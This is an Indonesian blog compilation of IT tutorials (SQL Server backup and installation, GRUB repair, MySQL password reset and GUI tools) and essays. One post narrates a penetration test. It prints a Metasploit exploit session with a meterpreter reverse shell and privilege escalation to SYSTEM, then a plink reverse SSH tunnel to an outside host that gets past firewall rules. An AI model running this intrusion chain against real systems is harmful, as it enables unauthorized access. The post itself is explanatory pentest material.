Tutorial ini akan membahas bagaimana caranya melakukan backup dan restore database menggunakan GUI dari SQL Server Management Studio. Backup-Restore merupakan salah satu basic skill yang harus dimiliki oleh Database Administrator. Oleh karena itu sebelum melangkah ke tutorial yang lebih advance, tutorial ini harus di publish terlebih dahulu, untuk mendukung tutorial-tutorial berikutnya

Prerequisite

1. Terinstall “SQL Server Express with Advance Features“ Instance Di PC/Laptop
2. Database Dummy (Menggunakan Adventure Works)

How To Backup

1. Connect ke SQL Server Express Instance menggunakan SQL Server Management Studio,  Sesuaikan, Server name dan Authentication Type
2. Expand Instance Name> Database Folder> klik kanan di database yang akan dibackup pilih Task>backup



3. Akan terbuka menu window untuk database backup seperti gambar di bawah
   
   1. Pastikan nama database yang akan di backup benar.
   2. Tentukan Backup Type. Ada tiga backup type yang dapat di pilih sebenarnya yakni full,differential, dan transaction log (hanya jika database dalam full recovery) pada tutorial ini memilih backup type full.
   3. Backup Component, “Filegroup” Apabila database terdiri/terpecah dari/ke beberapa file (filegroup) maka option ini memungkinkan untuk melakukan backup filegroup tertentu saja. Sebaliknya apabila memilih option “Database” maka otomatis semua filegroup (jika ada) akan terbackup semua. Pada database ini hanya terdiri dari 1 file primary saja, tidak menggunakan file group, maka kita pilih opsi “Database“.
   4. Backup Destination, kita dapat melakukan backup database ke dua device tape atau disk, kita menggunakan device disk, dan harus menentukan lokasi/ folder tempat file database backup akan dibuat.




4. Pilih “Add” Destination Backup





Tentukan nama file backup tanpa atau dengan extension file (tidak mempengaruhi).

Tampilan gambar setelah ditambahkan backup destination.(atas)

5. Lanjutkan dengan “OK“



Backup Database selesai.

Pernah dengar cloud computing????,,, sayang sekali kali ini kita tidak berbicara tentang cloud melainkan tentang embah nya cloud yaitu webservice, konsep cloud, SAAS (software as as services), dll sebenarnya adalah konsep pemikiran yang sudah ada sejak dahulu setidaknya sejak jaman pemikiran web service ini, seperti istilah istilah terkini yang merupakan bentuk repackage dari istilah terdahulu yang membuat para “Orang IT” sederajat dengan orang2 kedokteran (Dalam hal banyaknya  jumlah istilah yang dihapal hehehe)

1.Apa itu Web service? –> secara harfiah kita bisa bilang “servis yang diwebkan“, tidak terelakkan lagi perkembangan jaringan yang awalnya hanya untuk ketersambungan satu sama lain kali ini memjelma menjadi bentuk kolaborasi diantara para pelaku komunikasi , apapun bentuk platform OS nya , bahasa pemrogramaannya , selama bisa menterjemahkan input yang diberikan ,membaca output  yang berbentuk “XML”. Sistem berbasis windows bisa berkolaborasi dengan sistem yg linux bangget karena pada dasarnya kedua platform tersebut bisa berbicara menggunakan Bahasa universal yang orang IT bilang “XML” , pada akhirnya sebuah webservice bisa dimanfaatkan juga oleh mobile client berbasis android misalnya.

Sudah terbayang khan apa itu web service???, apapun bentuk webservice serta clientnya, mereka akan senantiasa bisa berkomunikasi dan bekerjasama dengan syarat bisa menulis dan membaca xml.

Pernah berlangganan RSS dari situs berita seperti detik.com misalnya, terkadang kita mendapatkan balikan / berita yang masih mentah berbentuk xml.

Pernah terpikirkan saat kita menggunakan GoogleDoc,, data yang bergerak dari dan ke browser adalah xml. Dan sudah banyak disebutkan bahwa googledoc adalah bentuk cloud computing untuk aplikasi (SAAS (software as a service))

bentuk platform cloud dari microsoft yang bernama Microsoft Office 365 (Office menggunakan web browser –> SAAS)

Jadi apa bedanya cloud computing (SAAS) dengan webservices????

apakah SAAS hanya merupakan bentuk “services” yang diwebkan??

Anda bebas menyimpulkan perbedaan dan kesamaan diantara keduanya, keduanya memfasilitasi kolaborasi online.

sekian dulu pengenalan webservicenya, selanjutnya akan saya bahas penggunaan visual studio untuk membuat dan memanfaatkan fasilitas webservice.

its long time no see.
Sudah lama tidak menulis, jadi teringat masa-masa dulu.
langsung aja, kita mulai lagi dengan pemanasan. kali ini saya akan menceritakan step by step untuk installasi SQL Server 2008 Enterprise di atas Windows Server 2008 Enterprise(DB Engine Only) agak sedikit basi memang ( mengingat SQL Server Denali sudah mau Release) Tapi tutorial ini memang mau tidak mau harus di torehkan juga, karena ini adalah awal dari tutorial-tutorial berikutnya. (kayak berkelanjutan aja nulisnya )

Latar Belakang

SQL Server 2008 enterprise ini di install di atas windows server 2008 enterprise. Kenapa tutorialnya mengenai Enterprise Product?

• Karena ini tidak disajikan di kampus-kampus pada umumnya (too much technical, but somehow you’ll need it).
• Karena product enterprise pada umumnya digunakan oleh perusahaan-perusahaan yang cukup mature.
  jadi diharapkan dengan memiliki pengetahuan sekelas enterprise product dapat memudahkan fresh graduates dalam memahami bentuk-bentuk aplikasi yang digunakan perusahaan pada umumnya.

Prerequisite

Baiklah, yang pertama ada prerequisite atau requirement untuk installasi lokal SQL Server 2008 Enterprise di PC atau Laptop :

Hardware:

1. PC/Laptop dengan CPU Proc >1 Ghz.
2. RAM min 1 Gb
3. HDD min 3 Gb

Software:

1. .NET Framework 3.5 SP1
2. SQL Server Native Client (optional)
3. SQL Server Setup Support Files (installer trial download)

Skils:

Basic Knowledge Application Installation on Windows OS

 Let’s begin,

1. Install the Prerequisite
   dotnetfx35sp1 bisa di download di sini
   
   

 

2. Install .Net Framework Features dari windows server
   go to start menu>administrative tools> server manager > features
   on the right section choose add features
   

 

3. Kemudian lanjutkan dengan install SQL Server 2008
   execute setup files dari windows explorergambar di bawah akan nampak apabila user access control di windows server anda di set sedikit terlalu secure pilih Yes 

 

terkadang akan tampil compatibility assistant pilih  “Run Program”


4. Selanjutnya akan tampil installation center
   pilih installation menu


pilih “New SQL Server stand-alone installation or add features to an existing installation”
menu ini digunakan untuk installasi awal (scratch) sql server/installasi named instance/penambahan features add-ons atau tools.

5. Memulai installasi
   
   jika status menunjukan passed semuanya, maka anda dapat melanjutkan installasi dengan mengklik OK.

 

6. Product Key
   
   kita akan membutuhkan product key untuk dapat melanjutkan installasi atau dapat memilih enterprise evaluation (trial 180 days)

 

7. License Agreement
   
   centang box “I accept the license terms” di bawah.

 

8. Settup Support Files
   
   Pilih “install”
   

 

9. Setup Support Rules
   Apabila statusnya menunjukan warning, anda tetap dapat melanjutkan installasi.

 

10. Feature Selection
    
    ada dua jenis features, yakni instance features dan shared features untuk mengetahui deskripsi setiap features, dapat dilihat di kolom description sebelah kanan saat kita highlight suatu features. Disarankan kita hanya menginstall feature2 yang kita butuhkan saja, karena installasi feature yang berlebihan dapat membebani komputer/laptop yang anda install, sehingga otomatis mengurangi performance dari DB engine sendiri.

 

11. Instance Configuration
    
    ada dua jenis tipe instance yaitu “Default Instance” dan “Named Instance” .
    Default Instance
    • digunakan apabila di komputer/laptop/server tersebut tidak ada database instance lainnya atau masih fresh installation
    • default instance akan mengambil nama host komputer tempat SQL Server terinstall.
    • Setiap host hanya dapat memiliki satu default instance

    Named Instance

    • Digunakan apabila ada penambahan instance baru di SQL Server yang sudah terdapat default instance
    • Named instance dapat berupa nama apa saja sesuai dengan yang diinginkan
    • penggunaan named instance harus disertai dengan pengaktifan SQL Browser hal ini diperlukan agar dari sisi aplikasi yang terhubung dengan SQL Server dapat mengenali named instance tersebut.

 

12. Diskspace Requirement
    
    diskspace requirement yang dibutuhkan tergantung dengan features yang diinstall, pada tutorial ini dibutuhkan 3 Gb atau lebih (recomended 5 GB)

 

13. Server Configuration
    
    pada point ini kita akan diminta untuk men-spesifikasi user account yang digunakan untuk running beberapa service SQL Server (untuk beginner atau lab dapat menggunakan account administrator lokal untuk semua service).
    klik “Use the same account for all SQL Server Services”, dan masukan user account yang dikehendaki.
    masih mengenai user account.
    Pada production environment di perusahaan besar, biasanya user account untuk service SQL Server seperti ini menggunakan service account (Microsoft Best Practice using domain service account), yakni account yang hanya dibuat khusus untuk menjalankan service-service program pada Host server tertentu (tidak untuk login). Dan untuk alasan keamanan setiap service biasanya memiliki user accountnya masing-masing.Untuk startup type kita bisa mengganti apakah automatic,manual atau disabled  yang diinginkan baik pada step ini maupun setelah installasi.Lanjutkan installasi dengan klik “Next”.

 

14. Database Engine Configuration
    
    pada step ini ada 3 tab yang perlu diketahui, Yaitu Account Provisioning, Data Directories, FILESTREAM.
    Account Provisioning
    pada tab ini kita diminta untuk menentukan user account yang akan digunakan untuk memaintain Database SQL Server.
    Ada dua tipeauthentication mode yakni windows authentication mode atau  Mixed Mode (SQL Server authentication and Windows authentication)
    Windows Authentication Mode : pada mode ini user account yang digunakan hanyalah user account windows level saja (hostname\username atau domain\username)
    Mixed Mode : pada mode ini user account yang digunakan bisa dua yakni OS Windows Level dan SQL Server Database level. Apabila mode ini yang dipilih maka nanti akan diminta untuk mengisikan password SA (system adminsitrator) account, SA account adalah built-in user dari SQL Server DB engine.
    pada data direcotries tab ini kita dapat mengatur directories structure atau struktur folder SQL Server 2008 ini.
    Database Root Directory : merupakan folder tempat file-file system dan konfigurasi SQL Server 2008, directory ini pada umumnya akan satu drive dengan Operating System
    User database directory  : merupakan default folder lokasi tempat user menyimpan database file, lokasi ini akan digunakan oleh SQL Server apabila dalam pembuatan database, user tidak memberikan lokasi yang spesifik/khusus untuk database barunya.
    Temp DB directory : merupakan folder lokasi datafile untuk database tempdb.
    Temp DB log directory: merupakan folder lokasi logfile untuk database tempdb.
    Backup directory : merupakan default folder lokasi untuk menyimpan backup file.penentuan lokasi-lokasi folder tersebut tergantung dari besarnya aktivitas insert, update, read, scan dll dari database sendiri, karena dapat mempengaruhi performa database menjadi lebih cepat atau lebih lambat.
    yang terakhir tab filestream. kita tidak menggunakan fitur FILESTREAM saat ini.
    Lanjutkan dengan klik “Next”
    

 

15. Error and Usage Reporting
    uncheck kedua pilihan tsb.

 

16. Installation Rules
    
    lanjutkan dengan klik “Next”
    

 

17. Installation Summary
    
    pada tahap ini kita dapat mereview dari setiap tahapan yang telah kita lalui sebelumnya.

 

18. Installation Progress dan Complete
    
    Sampai tahap ini installasi SQL Server dapat dikatakan selesai dan sukses.

Sekian tutorial singkat dan mudah dari saya, semoga dapat disusul dengan tulisan-tulisan atau tutorial-tutorial berikutnya.

Mohon maaf apabila ada salah-salah kata, apabila dari teman-teman pembaca ada yg ingin mengkoreksi tulisan saya, silakan disampaikan melalui comment field di bawah.

1. Apakah Perbanas cukup kompeteitif di kompetisi programming sekelas ACM ?(Association For Computing Machinery)

2 Apakah Perbanas cukup kompetitif di kompetisi nasional seperti Gemastik ?(baik programming maupun pembuatan aplikasi)

3. Apakah sebagian besat aplikasi-aplikasi di perbanas dibuat oleh “it’s own product” ?(Mahasiswa pagi non executive)

Saya berani jamin jawabannya BELUM !

Tentu saja saya tidak akan men-judge bahwa ini sepenuhnya kesalahan kampus dan jajarannya, karena ini sesungguhnya tanggung jawab bersama kita juga, baik sebagai alumni maupun sebagai seseorang  yang peduli dengan kampusnya, akan tetapi tetap kita harus menyelidiki dimanakah akar masalahnya?

Saya mendeteksi ada dua masalah utama dalam kurikulum yaitu ALGORITMA, STRUKTUR DATA , pertanyaan berikutnya adalah dimanakah salahnya ???

Sebelum saya kemukakan dimana salahnya, ada baiknya saya mengutip sebuah cerita dari kenalan saya yang berkuliah di Stanford University(Saya rasa tak perlu saya jelaskan tentang kredibilitas SU dibidang IT || CS) : Kenalan saya bercerita bahwa SU disemester awal pembelajaran algoritma, dibagi menjadi 2 kelas, 1. kelas yg mahasiswanya sudah bisa memprogram dan 2. kelas yang mahasiswanya masih awam(Saya akan fokus di kelas yang kedua, karena itu kondisi yg paling relevan terhadap topik bahasan kita kali ini)

Di kelas yang kedua pengajar mahasiswanya seorang profesor yang membuatkan bahasa pemrograman sederhana yg fokusnya hanya pada persoalan LOGIC, dan dibuat sesederhana mungkin dan kelasnya dibuat semenarik mungkin.

So dari paparan cerita di atas apa yang bisa kita dapatkan ???

1. Algoritma adalah mata kuliah yang sangat penting untuk menjadi programmer khususnya, orang yg berkecimpung di dunia IT umumnya,  ini terbukti dengan bahkan Universitas sekelas stanford saja menurunkan profesornya, yg bahkan bekerja lebih keras agar ulmunya dapat diterima murid2nya dengan baik dengan membuat bahasa pemrograman sederhana yang Language Agnostic terhadap mainstream

2. Pada paragraf kedua saya memberi penekanan pada LOGIC, kenapa saya beri penekanan pada kata tersebut ? sebab di sisi itulah kita gagal dalam melakukan identifikasi, maksudnya ? baik saya akan berikan ilustrasi berkenaan dengan paparan ini :

Ada seorang mahasiswa baru lulus dari SMA, diberikan sebuah pertanyaan sederhana :

- berapakah jawaban dari 2 pangkat 3, dengan cepat tanpa berpikir dia jawab 8

- Sekarang kita coba ke pertanyaan lebih sulit, sebutkanlah 5 bilangan prima pertama, lagi-lagi dengan cepat dia menjawab : 2,3,5,7,11

- Now for the last question, Tolong buat algoritmanya cara mencari persoalan di atas ? ……..(Panjang mikirnya xDD)

Mau tahu yang lebih ironis ??? bahkan banyak mahasiswa tingkat akhir yang saya temui-pun tak mampu membuat algoritma dari persoalan di atas, terus apa yang salah, apakah mahasiswanya kurang cerdas ? nope, karena jika mahasiswanya kurang cerdas tidak akan mereka mampu menjawab dua pertanyaan ilustrasi di atas (Ini mematahkan argumentasi dari puket 3 pada zaman saya berkuliah), terus kenapa ? secara logika sang mahasiswa paham cara memecahkan persoalan yg diilustrasikan, dan ketika diminta menjabarkan dalam bentuk algoritma dia bingung, karena ada suatu transisi dari logika matematika/manusia ke logika komputer yg tidak didapatkannya dalam pembelajaran algoritma. Penyebab transisi yang gagal? karena pelajaran algoritma dibuat abstrak padahal seluruh kegiatan komputer sudah abstrak.

Untuk bahan renungan saya akan mengutip quote dari salah seorang Guru Besar bidang informatika, salah seorang dosen yang saya kagumi(padahal sang dosen belum pernah ngajar saya ) pada saat ada pertanyaan dari kawan(Lulusan STM TELKOM) saya ketika matrikulasi : Pak saya ingin bertanya kenapa kita belajar pascal meskipun bahasanya sudah tidak kompetitif(saya perhalus kata2 kawan saya xD, soalnya terlalu kasar), beliau menjawab dengan kalimat yang cukup sederhana :

Komputer itu abstrak, semua sistem kerjanya dan instruksinya tak dapat kita lihat dan sudah pasti tidak manusiawi, menurut saya(Pak Eko) bahasa yg mampu memberikan instruksi paling mendekati bahasa manusia adalah bahasa pascal, oleh karena itulah pascal dujadikan bahasa pembelajaran (Prof. Richardus Eko Indrajit).

Identifikasi masalah Kurikulum Algoritma, telah selesai, paling tidak dari sisi pengalaman dan pengamatan saya.

Tapi sudahkah cukup untuk nenjawab pertanyaan topik besar kita ?, tentu belum karena Persoalan Struktur Data belum kita bahas. sebelum kita bahas ada baiknya kita renungkan, salah satu artikel dari salah satu sesepuh IT kita disini

Anyone realize something from the article ??? Yeah tentu saja sayapun merasakan dan bahkan pernah jadi bagian dari programmer yang disebutkan oleh sang sesepuh(Budi Rahardjo). Ok saya akan memberi sebuah ilustrasi kembali tentang bagaimana saya belajar catur :

Saya bukan orang yang hobi main catur namun entah kenapa saya senang ketika mempelajari catur, saya ingat ketika kecil kami belajar tentang karakteristik dari langkah yg mungkin dilakukan setiap buah catur, terus apa yanng saya lakukan?, ya saya mainkan, himgga buah-buah caturnya tinggal sedikit(secara logika wajar karena buah catur makin sedikit makin mudah sedikit yg perlu dipikirkan ), baru cari cara supaya bisa mengalahkan lawan, walaupun dengan satu kondisi yg pasti, meskipun buah catur banyak hilang yang penting menteri dan raja jangan hilang.(maklum itulah cara main waktu kecil )

Seiring waktu saya mulai menyadari meskipun scope buah catur yang bisa saya tangani makin banyak, dan makin banyak possibilty langkah yang dapat saya prediksi, namun ada juga kelemahan dengan cara ini, yaitu kita memainkan permainan catur beda lawan, beda langkah(meskipun lawan tersebut memiliki langkah yg sama dengan lawan sebelumnya) dgn kata lain kita mengkonstruksi “algoritma langkah catur dari awal secara acak” dan effortnya besar. setelah menyadarihal ini saya cari buku catur, ingin tahu kira2 klo buku catur ngajarin apa sih?, ternyata buku catur mengajarkan berbagai macam pembukaan catur dan gaya bermain yg dijadikan teori berdasarkan langkah-langkah yang biasa dilakukan pemain catur terkenal, dan setiap pembukaan dapat mengantisipasi beberapa jenis langkah, setelah saya mengetahui ini saya bermain agak sedikit tenang dan efisien….. Bingung korelasinya?

Korelasinya adalah coba kaitkan cerita ilustrasi saya di atas dengan tulisan sang sesepuh Budi Rahardjo……. Masih bingung ???

Untuk refleksi mari kita bedah dan lihat soal-soal kompetisi algoritma…. YEP soal kasus kompetisi algoritma rata2 menekankan kepada pemahaman struktur data yang mendalam, variasi soal dibuat untuk memecahkan persoalan struktur data, jadi…. bagaimanakah kita mengharapkan mahasiswa-mahasiswa mampu menjadi programmer yang kompetitif, bila kampus kita bergantung pada orang-orang yang berbakat dan minat programming seperti Reinir?, bukannya berpikir bagaimana membentuk mahasiswa-mahasiswa tertarik mempelajari programming dan baru menyaring orang-orang yg berbakat programming

Secara detil apakah permasalahan kurikulum struktur data kita, kembali lagi saya tegaskan pelajaran struktur data kita terlalu abstrak dan konseptual, terus ada juga yg berargumentasi :

1.bukankah mempelajari pemrograman sebaiknya language agnostic agar universal?

2.terus ada juga dosen yang merasa telah melakukan hal yang benar dan diapun berargumen : saya sudah kasih kebebasan mahasiswa ke mahasiswa berupa tugas codingan untuk struktur data, tapi pengajaran tetap konseptual terlepas dari bahasa pemrograman

Sebenarnya dua cara diatas valid untuk kasus seandainya mahasiswa tidak terlanjur alergi dengan pemrograman, dan untuk poin 2, gampang diakalin dengan banyaknya algoritma bahkan source code terkait dengan persoalan yg ditanyakan.

Jadi apa solusi dari saya ??? solusi dari saya, saya setuju dgn perlunya ditekankan tentang language agnostic, sehingga para mahasiswa tidak terjebak di hanya satu bahasa pemrograman, hanya karena dasar suka, tetapi mahasiswa mampu beradaptasi ke setiap bahasa pemrograman sesuai kebutuhan yang mereka hadapi. namun ada baiknya metode pendidikan untuk struktur data ini interaktif, koonseptual, dan praktek, dengan kata lain sang dosen untuk mata kuliah ini harus wajib menguasai salah satu bahasa pemrograman, dan sang dosen pun sudah harus paham cara pengaplikasian kode-kode struktur data di kehidupan sehari-hari, dan tentu saja sang dosen harus harus mampu mentransefer logika kode struktur data sebelum memberi tugas-tugas kasus struktur data.

Saya sangat yakin kalau konsep-konsep saya di atas mampu diterapkan di kampus, maka itu juga berarti kita semakin dekat terhadap solusi dari pertanyaaan utama dari topik ini, serta saya juga yakin programmer-programmer yang ada di perbanas akan semakin kompetitif, di kompetisi-kompetisi, baik regional maupun nasional, yg akan berimbas juga akan banyak mahasiswa-mahasiswa yang ingin membuat aplikasi yang bermanfaat, dan syukur-syukur bisa digunakan Perbanas.

Semoga tulisan pemanasan saya bermanfaat, dan mohon maaf bila ada kata-kata yang salah dan menyinggung.

Wassalammualaikum wr. wb

berikut langkah-langkahnya:

1. Pertama pastikan kalian telah memiliki Ubuntu 9.04 Jaunty Live CD, kalau tidak ada bisa pinjem tetangga ato numpang donlod di admin warnet, hehehe.
2. Kemudian booting melakukan Ubuntu Live CD tersebut, sampai masuk ke Ubuntu Desktop
3. Masuk ke terminal kemudian ketikan
   sudo fdisk -l (akan tampak seperti gambar dibawah)
   perintah ini berguna untuk mengecek partisi hardisk tempat Jaunty terinstall, agar tidak salah sasaran dalam melakukan perbaikan grub nantinya.
   
4. Langkah berikutnya masukan perintah sudo grub (akan tampak seperti gambar di bawah) perintah ini berguna untuk masuk ke mode grub.
   
5. Dalam mode grub (setelah langkah ke-4) ketikan perintah
   find /boot/grub/stage1 (akan tampak seperti gambar di bawah)
   perintah ini berguna untuk menemukan lokasi hardisk  serta partisi tempat grub berada.hasil dari perintah ini dapat berbeda-beda, tergantung kondisi partisi pada komputer atau laptop anda.
6. Setelah itu ketikan perintah root (hdo,4) ==>Sesuaikan dengan hasil dari langkah ke 5 Setelah mengetikan perintah ini tidak akan menghasilkan apa-apa.
   
7. Terakhir ketikan perintah setup (hd0,4)
   

Oke Finish, jaunty sudah kembali ke kandangnya. Smoga Membantu

Tehnik tunneling juga dipakai oleh pentester untuk mendukung pekerjaan penetration test. Mari kita lihat tehnik ini berjalan.
Sebagai seorang pentester, saya ditugaskan untuk menjebol sistem sampe tuntas, termasuk jaringan internal target. Singkat cerita, saya telah mendapatkan remote shell dari sebuah komputer yang hanya dapat diakses dari satu subnet jaringan. Setelah ditelusuri, komputer target membuka port 3389 yang artinya service Remote Desktop sedang berjalan dan siap diakses. Namun karena komputer target berada pada jaringan NAT, maka koneksi langsung ke port 3389 akan segera diblok oleh Gateway/Firewall. Saya mencoba koneksi reverse connect dengan netcat, namun yang menjadi penghalang, ternyata OUTBOUND rule pada firewall hanya memperbolehkan koneksi ke port 80 dan 443, selain itu di blok. Untuk itulah saya terpikir untuk menggunakan SSH Tunneling, sebuah server SSH saya siapkan untuk listening di port 80. OIya, saya menggunakan Backtrack untuk melakukan ini semua

Eksploitasi sukses dilakukan dengan Metasploit dengan sedikit metode Social engineering terhadap salah satu staff di perusahaan tersebut. Metasploit memberikan saya sebuah remote back shell meterpreter yang multifungsi.

msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[*] Started reverse handler on 203.128.250.15:4444
[*] Using URL: http://203.128.250.15:80/register.html
[*] Server started.
[*] Sending exploit to 203.128.250.15:51368...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (203.128.250.15:4444 -> 203.128.250.15:54652)

msf exploit(ms06_001_wmf_setabortproc) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  203.128.250.15:4444 -> 203.128.250.15:54652

msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: ITUSR-54\admin
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Setelah mendapatkan akses setara dengan SYSTEM, saya mengupload ssh client yang terdapat dalam paket Putty, yaitu plink.exe.

meterpreter > upload /pentest/windows-binaries/tools/plink.exe C:\\windows\
[*] uploading  : /pentest/windows-binaries/tools/plink.exe -> C:\\windows\
[*] uploaded   : /pentest/windows-binaries/tools/plink.exe -> C:\windows\
meterpreter >

Setelah itu saya mengakses shell pada target, dan mengeksekusi SSH client untuk segera membuat tunneling ke server SSH yang telah saya siapkan sebelumnya.

meterpreter > execute -f cmd -c -H
Process 1776 created.
Channel 2 created.
meterpreter > interact 2
Interacting with channel 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\Desktop>plink -P 80 -l root -pw toor -C -R 3389:127.0.0.1:3389 203.128.250.15
plink -P 80 -l root -pw toor -C -R 3389:127.0.0.1:3389 203.128.250.15
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's key fingerprint is:
ssh-rsa 2048 ce:bf:86:ed:50:68:bf:21:8f:c2:a9:63:9f:07:d5:0c
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y

BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution

Last login: Wed Feb 24 23:04:29 2010 from 10.5.5.243
root@bt:~#

Terlihat bahwa koneksi SSH telah terbentuk (pada port 80) antara target dengan komputer saya, ditandai dengan keluarnya shell Backtrack saya pada komputer target. Pada komputer saya, juga segera terbentuk port 3389 yang listening di 127.0.0.1 (localhost). Sampai saat ini, port 3389 service Remote Desktop komputer target telah berhasil di tunneling ke komputer saya dengan port yang sama, namun melewati koneksi SSH.

tom@bt:/$ rdesktop 127.0.0.1
Autoselected keyboard map en-us
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Tehnik tunneling sangat berguna untuk berbagai keadaan, salah satunya adalah situasi diatas.

Tehnik lainnya akan segera menyusul

Second Life adalah aplikasi virtual 3d berbasis internet yang diluncurkan pada tahun 2003. Second Life di kembangkan oleh perusahaan Linden Research, inc. Sebuah program klien yang gratis yang disebut Second Life Viewer memungkinkan para penggunanya disebut ‘Residents’, untuk berinteraksi dengan satu sama lain melalui avatar. Residents dapat mengeksplorasi, bertemu penduduk lain, bersosialisasi, berpartisipasi dalam kegiatan baik individu maupun kelompok, serta membuat dan memperdagangkan properti virtual dan jasa satu sama lain, atau melakukan perjalanan di seluruh dunia, yang mana Residents terhubung sebagai grid. Second Life diperuntukan kepada orang yang berusia 18 tahun ke atas, sementara Teen Second Life bagi yang berusia 13 hingga 17 tahun.

Dibangun dengan konsep software tiga dimensi alat pemodelan yang didasarkan pada bentuk geometri sederhana yang memungkinkan Residents untuk membangun objek virtual. Ini dapat digunakan dalam kombinasi dengan Linden Scripting Language yang dapat digunakan untuk menambah fungsionalitas ke obyek. Lebih kompleks seperti patung tiga dimensi prims (bahasa sehari-hari dikenal sebagai sculpties), tekstur untuk pakaian atau benda lainnya, dan animasi dan gerakan dapat dibuat menggunakan software eksternal. The Second Life Terms of Service memastikan bahwa pengguna memiliki hak cipta untuk setiap konten yang mereka ciptakan, dan server dan klien menyediakan fungsi-fungsi manajemen hak digital sederhana.

(source : wikipedia.org , translated by : andenaru)

My Quote :

Walaupun sepertinya tidak seramai Facebook namun aplikasi ini sepertinya menjadi varian baru dalam suasana menjalin jaringan sosial masing – masing individu yang membuat user menjadi lebih nyaman dan lebih membebaskan imajinasi.

Aplikasi ini juga sepertinya dapat menjadi ladang besar bagi para developer untuk mengembangkan objek – objek virtual lainnya untuk kepentingan berbagai macam aspek seperti pendidikan, bisnis, dll.

Gw sendiri sedang mencoba memainkan second life walaupun masih bingung mencari groups, places atau showcase yang full indonesian people hehehehe. see you on the Second Life!!!

Sebenarnya ini bukanlah sesuatu yang sulit, namun tetap saya akan jelaskan, untuk berjaga-jaga kalau suatu hari menemukan kasus serupa dan ternyata saya lupa.

Kurang lebih langkah-langkahnya adalah sebagai berikut (windows based) :

1. Masuk sebagai administrator ke windows.
2. Hentikan servis MySQL (Jika MySQL Server terinstall sebagai servisdi windows) di Control Panel>Administrative Tools>Services, lalu carilah service bernama MySQL kemudian STOP. Atau bila tidak berhasil gunakanlah Task Manager(ctrl+alt+del) untuk menghentikan proses atau aplikasi MySQL Server yang berjalan.
3. Buatlah sebuah file teks dengan menggunakan notepad, kemudain salin statemen di bawah ini ke dalam notepad.Isikan Password (MyNewPass) dengan password baru yang anda inginkan, atau biarkan kosong (‘ ’). UPDATE mysql.user SET Password=PASSWORD(’MyNewPass’) WHERE User=’root’;
   FLUSH PRIVILEGES;

   Update berfungsi untuk mengganti field password pada tabel User. Dan kemudian Flush berfungsi untuk merefresh tabel yang ada di server.

1. Kemudian simpan file dengan nama apa saja, dalam kasus ini file saya simpan dengan nama mysql-init.txt . Dan dapat disimpan dimana saja (pada kasus ini disimpan di c:\mysql-init.txt untuk mempermudah penulisan path dan pencarian file).
2. Kemudian masuk ke folder bin dari direktori MySQL dimana terletak file mysqld.exe, kemudian jalankan perintah untuk menyalakan MySQL dengan Option tambahan–init-file :
   C:\mysql\mysql server 5.1\bin\mysqld.exe –init-file=c:\mysql-init.txt
   Atau
   C:\mysql\mysql server 5.1\bin\mysqld.exe –default-file=c:\program files\mysql\mysql server 5.1\my.ini –init-file=c:\resetMySQL.text
   (apabila MySQL diinstall secara terpisah)
   
3. Kemudian aktifkan kembali servis windows untuk MySQL, dan masuklah dengan password yang baru anda ganti.
4. Restart database dan password baru pun dapat anda gunakan..

Mohon maaf yah kalo tutorialnya terlau singkat n gk ada gambarnya, selamat mencoba dan semoga berhasil.hehehe

sudo apt-get install mysql-admin
sudo apt-get install mysql-query-browser

Nah kalo mao install gk pake via synaptic, saya perefer donlod di sini , dengan catatan harus menjadi member dr Mysql dulu pastinya.
kalau sudah ketikan perintah seperti di bawah:

tar -xvf mysql-gui-tools-5.0r12-linux-i386.tar.gz /opt/mysql-gui-tools

kemudian untuk menjalankannya :

/opt/mysql-gui-tools-5.0/mysql-administrator
/opt/mysql-gui-tools-5.0/mysql-query-browser

ini merupakan salah satu contoh tampilan login untuk mysql-administrator:

yang dilingkari merupakan path dari mysql.sock, menurut penjelasan yang saya dapat, kalo di OS *Nix ada
resource yang namanya socket, itu digunakan untuk interkneksi antar proses disuatu mesin, dalam hal ini mysql server(localhost) dan mysql-admin(tools).
Nah klo di windoz itu biasa di sebut named pipe.

NB: field connecting using socket file wajib diisi apabila anda menginstall MySQL bundling dengan aplikasi lain
ex: lammp
yang mana ditakutkan path socketnya tidak dikenal oleh MySQL GUI Tools atau ketika ada tampilan eyoy seperti ini:

Could not connect to host ‘localhost’.
MySQL Error Nr. 2002
Can’t connect to local MySQL server through socket ‘/tmp/mysql.sock’ (2)

Click the ‘Ping’ button to see if there is a networking problem.

Untuk mengetahui letak mysql.sock lebih tepatnya silahkan lihat file my.cnf

Mungkin baru ini saja ilmu yang masih saya miliki, mohon bimbingan dan koreksinya apabila ada kesalahan dalam tulisan ini.

original post @ here from http://mayo1210.wordpress.com

mysql -u root -p password  nama_db < file_backup.sql

Syntax diatas diketikan pada comand promp di windows, di Ubuntu(linux) juga hampir sama. Begitu perintah di atas dieksekusi database secara keseluruhan (tergantung isi dari file_backup.sql-nya) langsung kembali di MySQL Server. berikut saya akan cuba melakukan restore dengan MySQL GUI Tools, sesuai judul,hehehe.

1. Langkah pertama adalah kita memilih opsi restore (seperti pada gambar di bawah) setelah berhasil login ke MySQL Administrator
   
2. Nah kemudian setelah itu kita pindah ke jendela sebelahnya dan menentukan file backup yang akan diseksekusi
   
3. Kemudian di tab sebelahnya ada pilihan Restore Content (sebenarnya ini optional, hanya saja jika memang dibutuhkan. Tidak ada salahnya juga menjelaskan sesuatu yang mungkin bermanfaat . Tab ini Masih Kosong kan yah?? pencet deh tuh tombol analyze backup fungsinya untuk melihat struktur tabel pada database yang akan kita restore. Di menu ini anda dapat menentukan tabel yang di restore keseluruhan atau hanya sebagian saja.
   
